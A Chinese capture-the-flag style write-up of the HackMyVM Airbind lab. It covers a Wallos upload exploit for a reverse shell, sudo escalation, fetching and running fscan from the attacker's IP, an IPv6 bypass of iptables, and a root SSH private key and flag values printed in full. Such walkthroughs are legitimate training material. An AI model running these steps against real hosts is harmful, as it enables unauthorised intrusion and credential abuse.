HackMyVM-Airbind靶机的测试报告

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、Getshell

3、提权

使用ipv6绕过iptables

四、结论

---

一、测试环境

1、系统环境

渗透机：kali2021.1(192.168.101.127)

靶  机：debian(192.168.101.112)

物理机：win11(192.168.101.241)

注意事项：

①该类型靶场只能在virtualBox上搭建，因此将靶机设置为桥接网络，方便进行渗透。攻击机kali也要桥接出来，不然会出问题。

②靶机启动失败：设置中取消勾选usb即可

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务探测)、gobuster(目录扫描)、nc(获取shell，测试端口)、ping6(探测ipv6地址)、ssh(进行远程连接)

物理机：burp suite(修改请求包)

测试网址：http://192.168.101.112

靶场介绍：由国外大佬搭建的靶场，类似于vulnhub，经常更新，需要翻墙才能进。

地址：https://hackmyvm.eu/machines/machine.php?vm=Airbind

二、测试目的

通过wallos的文件上传漏洞获取反弹shell，通过ipv6地址进行ssh连接绕过iptables。

三、操作过程

1、信息搜集

主机探测

arp-scan -l

靶机IP：192.168.101.112

物理机IP：192.168.101.241

端口和服务探测

nmap -sT -A -p- -T4 192.168.101.112

靶机开启了22端口(ssh服务)、80端口(web服务)

但是需要注意的细节是这里的22端口是filtered状态

目录扫描

gobuster dir -u http://192.168.101.112 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

2、Getshell

靶场主页是登录页面，测试弱口令成功登录

admin/admin

通过查找该webapps的漏洞，发现wallos存在文件上传的RCE漏洞

文件上传点在主页的Add first subscription

这里要谨慎操作，上传成功一次之后就上传不了文件了，可以提前留个快照再操作

在upload logo点上传文件，直接上传反弹shell文件，save保存，用burp抓save的包

根据漏洞exp

修改两个点：content-type和文件头

修改后放包，可以看到成功上传

上传的文件可以在/images/uploads/logos/中找到

http://192.168.101.112/images/uploads/logos/

攻击端开启监听，点击反弹shell文件即可获取shell

3、提权

查看sudo权限发现www-data用户有完整的sudo权限，那么可以直接拿下root用户了

sudo -l
sudo su root
id

进root的家目录拿flag：4408f370877687429c6ab332e6f560d0

SHELL=/bin/bash script -q /dev/null
cd
ls
cat user.txt

但是只是user.txt，很奇怪？

再看一下IP

ip a

可以看到，这个IP：10.0.3.241并不是web网页的地址

那么web主机的IP呢？

既然这是内网的一个IP，那就用fscan扫描一下该网段

wget 192.168.101.127:8888/fscan
chmod +x fscan

./fscan -h 10.0.3.241/24

可以看到，果然有另一个内网地址10.0.3.1，作为网关

可以ping到10.0.3.1

联想到开局扫描端口时22端口的filtered情况，尝试用nc探测22端口情况

正常探测22端口开放，会有回显，如下：

nc 127.0.0.1 22

在靶机探测，明显22端口探测被拦截，没有任何回显

nc 10.0.3.1 22

使用ipv6绕过iptables上线第二个系统

可以用ipv6广播来获取所有的ipv6地址，ff02::1是广播地址，向所有主机发送报文

ping6 -I eth0 ff02::1

这里获取了三个ipv6地址：

fe80::20c:29ff:fe1f:da51%eth0

fe80::a00:27ff:fedc:2a3b%eth0

fe80::cc02:bfff:fee5:f81c%eth0

尝试ssh连接ipv6地址，私钥可以在靶机的root根目录获取

cd .ssh
ls
cat id_rsa

私钥如下：

-----BEGIN OPENSSH PRIVATE KEY-----
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
EkGwPez9XGBEUAAAALcm9vdEB1YnVudHU=
-----END OPENSSH PRIVATE KEY-----

将私钥保存在攻击机kali上

vim id_rsa
cat id_rsa
chmod 600 id_rsa

ssh分别连接三个ipv6地址

fe80::a00:27ff:fedc:2a3b%eth0

ssh root@fe80::a00:27ff:fedc:2a3b%eth0 -i id_rsa

连接第二个地址成功连接，是root@airbind，一个新的用户。

查看IP可以看到，该系统是web网页的主机，也是10.0.3.1主机

在根目录找到第二个flag：2bd693135712f88726c22770278a2dcf

四、结论

一台主机也可以有两套系统同时运行，当iptables过滤ipv4地址的访问时，可以用ipv6地址绕过限制，进行连接。